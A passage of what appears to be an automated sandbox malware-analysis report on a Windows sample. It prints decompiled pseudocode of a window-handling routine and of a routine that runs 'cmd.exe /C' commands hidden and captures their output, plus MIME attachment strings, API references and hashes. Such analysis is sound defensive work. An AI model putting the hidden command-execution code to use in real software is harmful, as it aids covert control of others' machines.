                                                                                                                                                                                                                            • String ID: boundary="=_NextPart_2altrfkindysadvnqw3nerasdf"$ filename="$ name="$--=_NextPart_2altrfkindysadvnqw3nerasdf$--=_NextPart_2altrfkindysadvnqw3nerasdf--$--=_NextPart_2rfkindysadvnqw3nerasdf$--=_NextPart_2rfkindysadvnqw3nerasdf--$=_NextPart_2relrfksadvnqindyw3nerasdf$=_NextPart_2rfkindysadvnqw3nerasdf$Content-Disposition: $Content-Transfer-Encoding: $Content-Transfer-Encoding: 7bit$Content-Type: $Content-Type: multipart/alternative; $Content-Type: text/plain$This is a multi-part message in MIME format$application/octet-stream$attachment$base64
                                                                                                                                                                                                                            • API String ID: 0-1937961590
                                                                                                                                                                                                                            • Opcode ID: 994b891b018e337bbccbf8f8edbb286f4fa1d5b3e7b2e8b915e2e3685cf950e1
                                                                                                                                                                                                                            • Instruction ID: 43623eaf2d88f5b494d843f775698903c08517ba86c534fb9f8c92edba7d8250
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 994b891b018e337bbccbf8f8edbb286f4fa1d5b3e7b2e8b915e2e3685cf950e1
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9222DD34A00109DFDB04EFA5C585A9DB7F1FF49304F2088AAE915AB365CB34EE06CB59
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0045695C Relevance: 23.2, APIs: 12, Strings: 1, Instructions: 407windowCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 83%
                                                                                                                                                                                                                            			E0045695C(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				char _v12;
				intOrPtr _t149;
				intOrPtr _t154;
				intOrPtr _t155;
				intOrPtr _t160;
				intOrPtr _t162;
				intOrPtr _t163;
				void* _t165;
				struct HWND__* _t166;
				long _t176;
				signed int _t198;
				signed int _t199;
				long _t220;
				intOrPtr _t226;
				int _t231;
				intOrPtr _t232;
				intOrPtr _t241;
				intOrPtr _t245;
				signed int _t248;
				intOrPtr _t251;
				intOrPtr _t252;
				signed int _t258;
				long _t259;
				intOrPtr _t262;
				intOrPtr _t266;
				signed int _t269;
				intOrPtr _t270;
				intOrPtr _t271;
				signed int _t277;
				long _t278;
				intOrPtr _t281;
				signed int _t286;
				signed int _t287;
				long _t290;
				intOrPtr _t294;
				struct HWND__* _t299;
				signed int _t301;
				signed int _t302;
				signed int _t305;
				signed int _t307;
				long _t308;
				signed int _t311;
				signed int _t313;
				long _t314;
				signed int _t317;
				signed int _t318;
				signed int _t326;
				long _t328;
				intOrPtr _t331;
				intOrPtr _t362;
				long _t370;
				void* _t372;
				void* _t373;
				intOrPtr _t374;

				_t372 = _t373;
				_t374 = _t373 + 0xfffffff8;
				_v12 = 0;
				_v8 = __eax;
				_push(_t372);
				_push(0x456ec6);
				_push( *[fs:eax]);
				 *[fs:eax] = _t374;
				if(( *(_v8 + 0x1c) & 0x00000010) == 0 && ( *(_v8 + 0x2f4) & 0x00000004) != 0) {
					_t294 =  *0x49de28; // 0x422f40
					E00406A70(_t294,  &_v12);
					E0040D144(_v12, 1);
					E00404378();
				}
				_t149 =  *0x49ebb8; // 0x0
				E0045B100(_t149);
				 *(_v8 + 0x2f4) =  *(_v8 + 0x2f4) | 0x00000004;
				_push(_t372);
				_push(0x456ea9);
				_push( *[fs:edx]);
				 *[fs:edx] = _t374;
				if(( *(_v8 + 0x1c) & 0x00000010) == 0) {
					_t155 = _v8;
					_t378 =  *((char*)(_t155 + 0x1a6));
					if( *((char*)(_t155 + 0x1a6)) == 0) {
						_push(_t372);
						_push(0x456db0);
						_push( *[fs:eax]);
						 *[fs:eax] = _t374;
						E00403DE8(_v8, __eflags);
						 *[fs:eax] = 0;
						_t160 =  *0x49ebbc; // 0x0
						__eflags =  *((intOrPtr*)(_t160 + 0x6c)) - _v8;
						if( *((intOrPtr*)(_t160 + 0x6c)) == _v8) {
							__eflags = 0;
							E00455B08(_v8, 0);
						}
						_t162 = _v8;
						__eflags =  *((char*)(_t162 + 0x22f)) - 1;
						if( *((char*)(_t162 + 0x22f)) != 1) {
							_t163 = _v8;
							__eflags =  *(_t163 + 0x2f4) & 0x00000008;
							if(( *(_t163 + 0x2f4) & 0x00000008) == 0) {
								_t299 = 0;
								_t165 = E00441704(_v8);
								_t166 = GetActiveWindow();
								__eflags = _t165 - _t166;
								if(_t165 == _t166) {
									_t176 = IsIconic(E00441704(_v8));
									__eflags = _t176;
									if(_t176 == 0) {
										_t299 = E00451750(E00441704(_v8));
									}
								}
								__eflags = _t299;
								if(_t299 == 0) {
									ShowWindow(E00441704(_v8), 0);
								} else {
									SetWindowPos(E00441704(_v8), 0, 0, 0, 0, 0, 0x97);
									SetActiveWindow(_t299);
								}
							} else {
								SetWindowPos(E00441704(_v8), 0, 0, 0, 0, 0, 0x97);
							}
						} else {
							E0043EC5C(_v8);
						}
					} else {
						_push(_t372);
						_push(0x456a14);
						_push( *[fs:eax]);
						 *[fs:eax] = _t374;
						E00403DE8(_v8, _t378);
						 *[fs:eax] = 0;
						if( *((char*)(_v8 + 0x230)) == 4 ||  *((char*)(_v8 + 0x230)) == 6 &&  *((char*)(_v8 + 0x22f)) == 1) {
							if( *((char*)(_v8 + 0x22f)) != 1) {
								_t301 = E004581F4() -  *(_v8 + 0x48);
								__eflags = _t301;
								_t302 = _t301 >> 1;
								if(_t301 < 0) {
									asm("adc ebx, 0x0");
								}
								_t198 = E004581E8() -  *(_v8 + 0x4c);
								__eflags = _t198;
								_t199 = _t198 >> 1;
								if(_t198 < 0) {
									asm("adc eax, 0x0");
								}
							} else {
								_t241 =  *0x49ebb8; // 0x0
								_t305 = E0043A980( *((intOrPtr*)(_t241 + 0x44))) -  *(_v8 + 0x48);
								_t302 = _t305 >> 1;
								if(_t305 < 0) {
									asm("adc ebx, 0x0");
								}
								_t245 =  *0x49ebb8; // 0x0
								_t248 = E0043A9C4( *((intOrPtr*)(_t245 + 0x44))) -  *(_v8 + 0x4c);
								_t199 = _t248 >> 1;
								if(_t248 < 0) {
									asm("adc eax, 0x0");
								}
							}
							if(_t302 < 0) {
								_t302 = 0;
							}
							if(_t199 < 0) {
								_t199 = 0;
							}
							_t326 = _t199;
							 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
							if( *((char*)(_v8 + 0x57)) != 0) {
								E00454DB8(_v8, _t326);
							}
						} else {
							_t251 =  *((intOrPtr*)(_v8 + 0x230));
							__eflags = _t251 + 0xfa - 2;
							if(_t251 + 0xfa - 2 >= 0) {
								__eflags = _t251 - 5;
								if(_t251 == 5) {
									_t252 = _v8;
									__eflags =  *((char*)(_t252 + 0x22f)) - 1;
									if( *((char*)(_t252 + 0x22f)) != 1) {
										_t307 = E00458224() -  *(_v8 + 0x48);
										__eflags = _t307;
										_t308 = _t307 >> 1;
										if(_t307 < 0) {
											asm("adc ebx, 0x0");
										}
										_t258 = E00458218() -  *(_v8 + 0x4c);
										__eflags = _t258;
										_t259 = _t258 >> 1;
										if(_t258 < 0) {
											asm("adc eax, 0x0");
										}
									} else {
										_t262 =  *0x49ebb8; // 0x0
										_t311 = E0043A980( *((intOrPtr*)(_t262 + 0x44))) -  *(_v8 + 0x48);
										__eflags = _t311;
										_t308 = _t311 >> 1;
										if(_t311 < 0) {
											asm("adc ebx, 0x0");
										}
										_t266 =  *0x49ebb8; // 0x0
										_t269 = E0043A9C4( *((intOrPtr*)(_t266 + 0x44))) -  *(_v8 + 0x4c);
										__eflags = _t269;
										_t259 = _t269 >> 1;
										if(_t269 < 0) {
											asm("adc eax, 0x0");
										}
									}
									__eflags = _t308;
									if(_t308 < 0) {
										_t308 = 0;
										__eflags = 0;
									}
									__eflags = _t259;
									if(_t259 < 0) {
										_t259 = 0;
										__eflags = 0;
									}
									 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
								}
							} else {
								_t270 =  *0x49ebb8; // 0x0
								_t370 =  *(_t270 + 0x44);
								_t271 = _v8;
								__eflags =  *((char*)(_t271 + 0x230)) - 7;
								if( *((char*)(_t271 + 0x230)) == 7) {
									_t362 =  *0x44ff0c; // 0x44ff58
									_t290 = E00403D78( *(_v8 + 4), _t362);
									__eflags = _t290;
									if(_t290 != 0) {
										_t370 =  *(_v8 + 4);
									}
								}
								__eflags = _t370;
								if(_t370 == 0) {
									_t313 = E004581F4() -  *(_v8 + 0x48);
									__eflags = _t313;
									_t314 = _t313 >> 1;
									if(_t313 < 0) {
										asm("adc ebx, 0x0");
									}
									_t277 = E004581E8() -  *(_v8 + 0x4c);
									__eflags = _t277;
									_t278 = _t277 >> 1;
									if(_t277 < 0) {
										asm("adc eax, 0x0");
									}
								} else {
									_t317 =  *((intOrPtr*)(_t370 + 0x48)) -  *(_v8 + 0x48);
									__eflags = _t317;
									_t318 = _t317 >> 1;
									if(_t317 < 0) {
										asm("adc ebx, 0x0");
									}
									_t314 = _t318 +  *((intOrPtr*)(_t370 + 0x40));
									_t286 =  *((intOrPtr*)(_t370 + 0x4c)) -  *(_v8 + 0x4c);
									__eflags = _t286;
									_t287 = _t286 >> 1;
									if(_t286 < 0) {
										asm("adc eax, 0x0");
									}
									_t278 = _t287 +  *((intOrPtr*)(_t370 + 0x44));
								}
								__eflags = _t314;
								if(_t314 < 0) {
									_t314 = 0;
									__eflags = 0;
								}
								__eflags = _t278;
								if(_t278 < 0) {
									_t278 = 0;
									__eflags = 0;
								}
								_t328 = _t278;
								 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
								_t281 = _v8;
								__eflags =  *((char*)(_t281 + 0x57));
								if( *((char*)(_t281 + 0x57)) != 0) {
									E00454DB8(_v8, _t328);
								}
							}
						}
						 *((char*)(_v8 + 0x230)) = 0;
						if( *((char*)(_v8 + 0x22f)) != 1) {
							ShowWindow(E00441704(_v8),  *(0x49bee0 + ( *(_v8 + 0x22b) & 0x000000ff) * 4));
						} else {
							if( *(_v8 + 0x22b) != 2) {
								ShowWindow(E00441704(_v8),  *(0x49bee0 + ( *(_v8 + 0x22b) & 0x000000ff) * 4));
								_t220 =  *(_v8 + 0x48) |  *(_v8 + 0x4c) << 0x00000010;
								__eflags = _t220;
								CallWindowProcA(0x407538, E00441704(_v8), 5, 0, _t220);
								E0043B1DC();
							} else {
								_t231 = E00441704(_v8);
								_t232 =  *0x49ebb8; // 0x0
								SendMessageA( *( *((intOrPtr*)(_t232 + 0x44)) + 0x254), 0x223, _t231, 0);
								ShowWindow(E00441704(_v8), 3);
							}
							_t226 =  *0x49ebb8; // 0x0
							SendMessageA( *( *((intOrPtr*)(_t226 + 0x44)) + 0x254), 0x234, 0, 0);
						}
					}
				}
				_pop(_t331);
				 *[fs:eax] = _t331;
				_push(0x456eb0);
				_t154 = _v8;
				 *(_t154 + 0x2f4) =  *(_t154 + 0x2f4) & 0x000000fb;
				return _t154;
			}


























































                                                                                                                                                                                                                            0x0045695d
                                                                                                                                                                                                                            0x0045695f
                                                                                                                                                                                                                            0x00456967
                                                                                                                                                                                                                            0x0045696a
                                                                                                                                                                                                                            0x0045696f
                                                                                                                                                                                                                            0x00456970
                                                                                                                                                                                                                            0x00456975
                                                                                                                                                                                                                            0x00456978
                                                                                                                                                                                                                            0x00456982
                                                                                                                                                                                                                            0x00456993
                                                                                                                                                                                                                            0x00456998
                                                                                                                                                                                                                            0x004569a7
                                                                                                                                                                                                                            0x004569ac
                                                                                                                                                                                                                            0x004569ac
                                                                                                                                                                                                                            0x004569b1
                                                                                                                                                                                                                            0x004569b6
                                                                                                                                                                                                                            0x004569be
                                                                                                                                                                                                                            0x004569c7
                                                                                                                                                                                                                            0x004569c8
                                                                                                                                                                                                                            0x004569cd
                                                                                                                                                                                                                            0x004569d0
                                                                                                                                                                                                                            0x004569da
                                                                                                                                                                                                                            0x004569e0
                                                                                                                                                                                                                            0x004569e3
                                                                                                                                                                                                                            0x004569ea
                                                                                                                                                                                                                            0x00456d8e
                                                                                                                                                                                                                            0x00456d8f
                                                                                                                                                                                                                            0x00456d94
                                                                                                                                                                                                                            0x00456d97
                                                                                                                                                                                                                            0x00456da1
                                                                                                                                                                                                                            0x00456dab
                                                                                                                                                                                                                            0x00456dc7
                                                                                                                                                                                                                            0x00456dcf
                                                                                                                                                                                                                            0x00456dd2
                                                                                                                                                                                                                            0x00456dd4
                                                                                                                                                                                                                            0x00456dd9
                                                                                                                                                                                                                            0x00456dd9
                                                                                                                                                                                                                            0x00456dde
                                                                                                                                                                                                                            0x00456de1
                                                                                                                                                                                                                            0x00456de8
                                                                                                                                                                                                                            0x00456df7
                                                                                                                                                                                                                            0x00456dfa
                                                                                                                                                                                                                            0x00456e01
                                                                                                                                                                                                                            0x00456e22
                                                                                                                                                                                                                            0x00456e27
                                                                                                                                                                                                                            0x00456e2e
                                                                                                                                                                                                                            0x00456e33
                                                                                                                                                                                                                            0x00456e35
                                                                                                                                                                                                                            0x00456e40
                                                                                                                                                                                                                            0x00456e45
                                                                                                                                                                                                                            0x00456e47
                                                                                                                                                                                                                            0x00456e56
                                                                                                                                                                                                                            0x00456e56
                                                                                                                                                                                                                            0x00456e47
                                                                                                                                                                                                                            0x00456e58
                                                                                                                                                                                                                            0x00456e5a
                                                                                                                                                                                                                            0x00456e8c
                                                                                                                                                                                                                            0x00456e5c
                                                                                                                                                                                                                            0x00456e74
                                                                                                                                                                                                                            0x00456e7a
                                                                                                                                                                                                                            0x00456e7a
                                                                                                                                                                                                                            0x00456e03
                                                                                                                                                                                                                            0x00456e1b
                                                                                                                                                                                                                            0x00456e1b
                                                                                                                                                                                                                            0x00456dea
                                                                                                                                                                                                                            0x00456ded
                                                                                                                                                                                                                            0x00456ded
                                                                                                                                                                                                                            0x004569f0
                                                                                                                                                                                                                            0x004569f2
                                                                                                                                                                                                                            0x004569f3
                                                                                                                                                                                                                            0x004569f8
                                                                                                                                                                                                                            0x004569fb
                                                                                                                                                                                                                            0x00456a05
                                                                                                                                                                                                                            0x00456a0f
                                                                                                                                                                                                                            0x00456a35
                                                                                                                                                                                                                            0x00456a61
                                                                                                                                                                                                                            0x00456aaa
                                                                                                                                                                                                                            0x00456aaa
                                                                                                                                                                                                                            0x00456aad
                                                                                                                                                                                                                            0x00456aaf
                                                                                                                                                                                                                            0x00456ab1
                                                                                                                                                                                                                            0x00456ab1
                                                                                                                                                                                                                            0x00456ac1
                                                                                                                                                                                                                            0x00456ac1
                                                                                                                                                                                                                            0x00456ac4
                                                                                                                                                                                                                            0x00456ac6
                                                                                                                                                                                                                            0x00456ac8
                                                                                                                                                                                                                            0x00456ac8
                                                                                                                                                                                                                            0x00456a63
                                                                                                                                                                                                                            0x00456a63
                                                                                                                                                                                                                            0x00456a75
                                                                                                                                                                                                                            0x00456a78
                                                                                                                                                                                                                            0x00456a7a
                                                                                                                                                                                                                            0x00456a7c
                                                                                                                                                                                                                            0x00456a7c
                                                                                                                                                                                                                            0x00456a7f
                                                                                                                                                                                                                            0x00456a8f
                                                                                                                                                                                                                            0x00456a92
                                                                                                                                                                                                                            0x00456a94
                                                                                                                                                                                                                            0x00456a96
                                                                                                                                                                                                                            0x00456a96
                                                                                                                                                                                                                            0x00456a94
                                                                                                                                                                                                                            0x00456acd
                                                                                                                                                                                                                            0x00456acf
                                                                                                                                                                                                                            0x00456acf
                                                                                                                                                                                                                            0x00456ad3
                                                                                                                                                                                                                            0x00456ad5
                                                                                                                                                                                                                            0x00456ad5
                                                                                                                                                                                                                            0x00456ae5
                                                                                                                                                                                                                            0x00456aee
                                                                                                                                                                                                                            0x00456afb
                                                                                                                                                                                                                            0x00456b04
                                                                                                                                                                                                                            0x00456b04
                                                                                                                                                                                                                            0x00456b0e
                                                                                                                                                                                                                            0x00456b11
                                                                                                                                                                                                                            0x00456b1c
                                                                                                                                                                                                                            0x00456b1f
                                                                                                                                                                                                                            0x00456bf3
                                                                                                                                                                                                                            0x00456bf5
                                                                                                                                                                                                                            0x00456bfb
                                                                                                                                                                                                                            0x00456bfe
                                                                                                                                                                                                                            0x00456c05
                                                                                                                                                                                                                            0x00456c4e
                                                                                                                                                                                                                            0x00456c4e
                                                                                                                                                                                                                            0x00456c51
                                                                                                                                                                                                                            0x00456c53
                                                                                                                                                                                                                            0x00456c55
                                                                                                                                                                                                                            0x00456c55
                                                                                                                                                                                                                            0x00456c65
                                                                                                                                                                                                                            0x00456c65
                                                                                                                                                                                                                            0x00456c68
                                                                                                                                                                                                                            0x00456c6a
                                                                                                                                                                                                                            0x00456c6c
                                                                                                                                                                                                                            0x00456c6c
                                                                                                                                                                                                                            0x00456c07
                                                                                                                                                                                                                            0x00456c07
                                                                                                                                                                                                                            0x00456c19
                                                                                                                                                                                                                            0x00456c19
                                                                                                                                                                                                                            0x00456c1c
                                                                                                                                                                                                                            0x00456c1e
                                                                                                                                                                                                                            0x00456c20
                                                                                                                                                                                                                            0x00456c20
                                                                                                                                                                                                                            0x00456c23
                                                                                                                                                                                                                            0x00456c33
                                                                                                                                                                                                                            0x00456c33
                                                                                                                                                                                                                            0x00456c36
                                                                                                                                                                                                                            0x00456c38
                                                                                                                                                                                                                            0x00456c3a
                                                                                                                                                                                                                            0x00456c3a
                                                                                                                                                                                                                            0x00456c38
                                                                                                                                                                                                                            0x00456c6f
                                                                                                                                                                                                                            0x00456c71
                                                                                                                                                                                                                            0x00456c73
                                                                                                                                                                                                                            0x00456c73
                                                                                                                                                                                                                            0x00456c73
                                                                                                                                                                                                                            0x00456c75
                                                                                                                                                                                                                            0x00456c77
                                                                                                                                                                                                                            0x00456c79
                                                                                                                                                                                                                            0x00456c79
                                                                                                                                                                                                                            0x00456c79
                                                                                                                                                                                                                            0x00456c92
                                                                                                                                                                                                                            0x00456c92
                                                                                                                                                                                                                            0x00456b25
                                                                                                                                                                                                                            0x00456b25
                                                                                                                                                                                                                            0x00456b2a
                                                                                                                                                                                                                            0x00456b2d
                                                                                                                                                                                                                            0x00456b30
                                                                                                                                                                                                                            0x00456b37
                                                                                                                                                                                                                            0x00456b3f
                                                                                                                                                                                                                            0x00456b45
                                                                                                                                                                                                                            0x00456b4a
                                                                                                                                                                                                                            0x00456b4c
                                                                                                                                                                                                                            0x00456b51
                                                                                                                                                                                                                            0x00456b51
                                                                                                                                                                                                                            0x00456b4c
                                                                                                                                                                                                                            0x00456b54
                                                                                                                                                                                                                            0x00456b56
                                                                                                                                                                                                                            0x00456b8f
                                                                                                                                                                                                                            0x00456b8f
                                                                                                                                                                                                                            0x00456b92
                                                                                                                                                                                                                            0x00456b94
                                                                                                                                                                                                                            0x00456b96
                                                                                                                                                                                                                            0x00456b96
                                                                                                                                                                                                                            0x00456ba6
                                                                                                                                                                                                                            0x00456ba6
                                                                                                                                                                                                                            0x00456ba9
                                                                                                                                                                                                                            0x00456bab
                                                                                                                                                                                                                            0x00456bad
                                                                                                                                                                                                                            0x00456bad
                                                                                                                                                                                                                            0x00456b58
                                                                                                                                                                                                                            0x00456b5e
                                                                                                                                                                                                                            0x00456b5e
                                                                                                                                                                                                                            0x00456b61
                                                                                                                                                                                                                            0x00456b63
                                                                                                                                                                                                                            0x00456b65
                                                                                                                                                                                                                            0x00456b65
                                                                                                                                                                                                                            0x00456b68
                                                                                                                                                                                                                            0x00456b71
                                                                                                                                                                                                                            0x00456b71
                                                                                                                                                                                                                            0x00456b74
                                                                                                                                                                                                                            0x00456b76
                                                                                                                                                                                                                            0x00456b78
                                                                                                                                                                                                                            0x00456b78
                                                                                                                                                                                                                            0x00456b7b
                                                                                                                                                                                                                            0x00456b7b
                                                                                                                                                                                                                            0x00456bb0
                                                                                                                                                                                                                            0x00456bb2
                                                                                                                                                                                                                            0x00456bb4
                                                                                                                                                                                                                            0x00456bb4
                                                                                                                                                                                                                            0x00456bb4
                                                                                                                                                                                                                            0x00456bb6
                                                                                                                                                                                                                            0x00456bb8
                                                                                                                                                                                                                            0x00456bba
                                                                                                                                                                                                                            0x00456bba
                                                                                                                                                                                                                            0x00456bba
                                                                                                                                                                                                                            0x00456bca
                                                                                                                                                                                                                            0x00456bd3
                                                                                                                                                                                                                            0x00456bd9
                                                                                                                                                                                                                            0x00456bdc
                                                                                                                                                                                                                            0x00456be0
                                                                                                                                                                                                                            0x00456be9
                                                                                                                                                                                                                            0x00456be9
                                                                                                                                                                                                                            0x00456be0
                                                                                                                                                                                                                            0x00456b1f
                                                                                                                                                                                                                            0x00456c9b
                                                                                                                                                                                                                            0x00456cac
                                                                                                                                                                                                                            0x00456d82
                                                                                                                                                                                                                            0x00456cb2
                                                                                                                                                                                                                            0x00456cbc
                                                                                                                                                                                                                            0x00456d0f
                                                                                                                                                                                                                            0x00456d23
                                                                                                                                                                                                                            0x00456d23
                                                                                                                                                                                                                            0x00456d38
                                                                                                                                                                                                                            0x00456d40
                                                                                                                                                                                                                            0x00456cbe
                                                                                                                                                                                                                            0x00456cc3
                                                                                                                                                                                                                            0x00456cce
                                                                                                                                                                                                                            0x00456cdd
                                                                                                                                                                                                                            0x00456ced
                                                                                                                                                                                                                            0x00456ced
                                                                                                                                                                                                                            0x00456d4e
                                                                                                                                                                                                                            0x00456d5d
                                                                                                                                                                                                                            0x00456d5d
                                                                                                                                                                                                                            0x00456cac
                                                                                                                                                                                                                            0x004569ea
                                                                                                                                                                                                                            0x00456e93
                                                                                                                                                                                                                            0x00456e96
                                                                                                                                                                                                                            0x00456e99
                                                                                                                                                                                                                            0x00456e9e
                                                                                                                                                                                                                            0x00456ea1
                                                                                                                                                                                                                            0x00456ea8

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SendMessageA.USER32 ref: 00456CDD
                                                                                                                                                                                                                              • Part of subcall function 00406A70: LoadStringA.USER32 ref: 00406AA1
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: LoadMessageSendString
                                                                                                                                                                                                                            • String ID: @/B
                                                                                                                                                                                                                            • API String ID: 1946433856-85281795
                                                                                                                                                                                                                            • Opcode ID: f732cc950298462dbf8775e8013057fa37c1ddea6ba143f1f22029aec632b822
                                                                                                                                                                                                                            • Instruction ID: 4b6bfc7c0ddb1c0560f123697eaff68a2ce520b055fb56cf76eb45ff435e8cfa
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f732cc950298462dbf8775e8013057fa37c1ddea6ba143f1f22029aec632b822
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 18F14E30A00204EFDB01DBA9C985F9E77F5AB05305F6545B6E944AB3A3D738BE44DB48
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00475384 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 158processfilesynchronizationCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 38%
                                                                                                                                                                                                                            			E00475384(intOrPtr __eax, void* __ebx, void* __ecx, intOrPtr __edx, void* __esi, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v16;
				void* _v20;
				long _v24;
				char _v28;
				struct _SECURITY_ATTRIBUTES _v40;
				struct _STARTUPINFOA _v108;
				struct _PROCESS_INFORMATION _v124;
				char _v380;
				char _v384;
				char _v388;
				CHAR* _t77;
				void* _t112;
				intOrPtr _t125;
				intOrPtr _t126;
				void* _t131;
				void* _t133;
				void* _t134;
				intOrPtr _t135;

				_t133 = _t134;
				_t135 = _t134 + 0xfffffe80;
				_v388 = 0;
				_v384 = 0;
				_v28 = 0;
				_t131 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				E00404E70(_v8);
				E00404E70(_v12);
				_push(_t133);
				_push(0x4755bb);
				_push( *[fs:eax]);
				 *[fs:eax] = _t135;
				E004049C0(__ecx);
				_v40.nLength = 0xc;
				_v40.bInheritHandle = 0xffffffff;
				_v40.lpSecurityDescriptor = 0;
				CreatePipe( &_v16,  &_v20,  &_v40, 0);
				_push(_t133);
				_push(0x475581);
				_push( *[fs:eax]);
				 *[fs:eax] = _t135;
				E004032B4( &_v108, 0x44);
				_v108.cb = 0x44;
				_v108.dwFlags = 0x101;
				_v108.wShowWindow = 0;
				_v108.hStdInput = GetStdHandle(0xfffffff6);
				_v108.hStdOutput = _v20;
				_v108.hStdError = _v20;
				if(E00409A58(_v12) == 0) {
					E00404A58( &_v28, 0x4755d0);
				} else {
					E00404A58( &_v28, _v12);
				}
				_t77 = E00404E80(_v28);
				E00404CCC( &_v384, _v8, "cmd.exe /C ");
				CreateProcessA(0, E00404E80(_v384), 0, 0, 0xffffffff, 0, 0, _t77,  &_v108,  &_v124);
				asm("sbb ebx, ebx");
				_t112 = 1;
				CloseHandle(_v20);
				if(1 == 0) {
					_pop(_t125);
					 *[fs:eax] = _t125;
					_push(0x475588);
					return CloseHandle(_v16);
				} else {
					_push(_t133);
					_push(0x475563);
					_push( *[fs:eax]);
					 *[fs:eax] = _t135;
					do {
						ReadFile(_v16,  &_v380, 0xff,  &_v24, 0);
						asm("sbb ebx, ebx");
						_t112 = _t112 + 1;
						if(_v24 > 0) {
							 *((char*)(_t133 + _v24 - 0x178)) = 0;
							OemToCharA( &_v380,  &_v380);
							E00404C30( &_v388, 0x100,  &_v380);
							E00404C88(_t131, _v388);
						}
					} while (_t112 != 0 && _v24 != 0);
					WaitForSingleObject(_v124.hProcess, 0xffffffff);
					_pop(_t126);
					 *[fs:eax] = _t126;
					_push(0x47556a);
					CloseHandle(_v124.hThread);
					return CloseHandle(_v124);
				}
			}























                                                                                                                                                                                                                            0x00475385
                                                                                                                                                                                                                            0x00475387
                                                                                                                                                                                                                            0x00475391
                                                                                                                                                                                                                            0x00475397
                                                                                                                                                                                                                            0x0047539d
                                                                                                                                                                                                                            0x004753a0
                                                                                                                                                                                                                            0x004753a2
                                                                                                                                                                                                                            0x004753a5
                                                                                                                                                                                                                            0x004753ab
                                                                                                                                                                                                                            0x004753b3
                                                                                                                                                                                                                            0x004753ba
                                                                                                                                                                                                                            0x004753bb
                                                                                                                                                                                                                            0x004753c0
                                                                                                                                                                                                                            0x004753c3
                                                                                                                                                                                                                            0x004753c8
                                                                                                                                                                                                                            0x004753cd
                                                                                                                                                                                                                            0x004753d4
                                                                                                                                                                                                                            0x004753dd
                                                                                                                                                                                                                            0x004753ee
                                                                                                                                                                                                                            0x004753f5
                                                                                                                                                                                                                            0x004753f6
                                                                                                                                                                                                                            0x004753fb
                                                                                                                                                                                                                            0x004753fe
                                                                                                                                                                                                                            0x0047540b
                                                                                                                                                                                                                            0x00475410
                                                                                                                                                                                                                            0x00475417
                                                                                                                                                                                                                            0x0047541e
                                                                                                                                                                                                                            0x0047542b
                                                                                                                                                                                                                            0x00475431
                                                                                                                                                                                                                            0x00475437
                                                                                                                                                                                                                            0x00475444
                                                                                                                                                                                                                            0x0047545b
                                                                                                                                                                                                                            0x00475446
                                                                                                                                                                                                                            0x0047544c
                                                                                                                                                                                                                            0x0047544c
                                                                                                                                                                                                                            0x0047546b
                                                                                                                                                                                                                            0x00475489
                                                                                                                                                                                                                            0x0047549c
                                                                                                                                                                                                                            0x004754a4
                                                                                                                                                                                                                            0x004754a6
                                                                                                                                                                                                                            0x004754ab
                                                                                                                                                                                                                            0x004754b2
                                                                                                                                                                                                                            0x0047556c
                                                                                                                                                                                                                            0x0047556f
                                                                                                                                                                                                                            0x00475572
                                                                                                                                                                                                                            0x00475580
                                                                                                                                                                                                                            0x004754b8
                                                                                                                                                                                                                            0x004754ba
                                                                                                                                                                                                                            0x004754bb
                                                                                                                                                                                                                            0x004754c0
                                                                                                                                                                                                                            0x004754c3
                                                                                                                                                                                                                            0x004754c6
                                                                                                                                                                                                                            0x004754dc
                                                                                                                                                                                                                            0x004754e4
                                                                                                                                                                                                                            0x004754e6
                                                                                                                                                                                                                            0x004754eb
                                                                                                                                                                                                                            0x004754f0
                                                                                                                                                                                                                            0x00475506
                                                                                                                                                                                                                            0x0047551c
                                                                                                                                                                                                                            0x00475529
                                                                                                                                                                                                                            0x00475529
                                                                                                                                                                                                                            0x0047552e
                                                                                                                                                                                                                            0x0047553e
                                                                                                                                                                                                                            0x00475545
                                                                                                                                                                                                                            0x00475548
                                                                                                                                                                                                                            0x0047554b
                                                                                                                                                                                                                            0x00475554
                                                                                                                                                                                                                            0x00475562
                                                                                                                                                                                                                            0x00475562

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000,?,?,?,?,00000000,004755BB), ref: 004753EE
                                                                                                                                                                                                                            • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,?,?,?,00000000,00475581,?,?,?), ref: 00475426
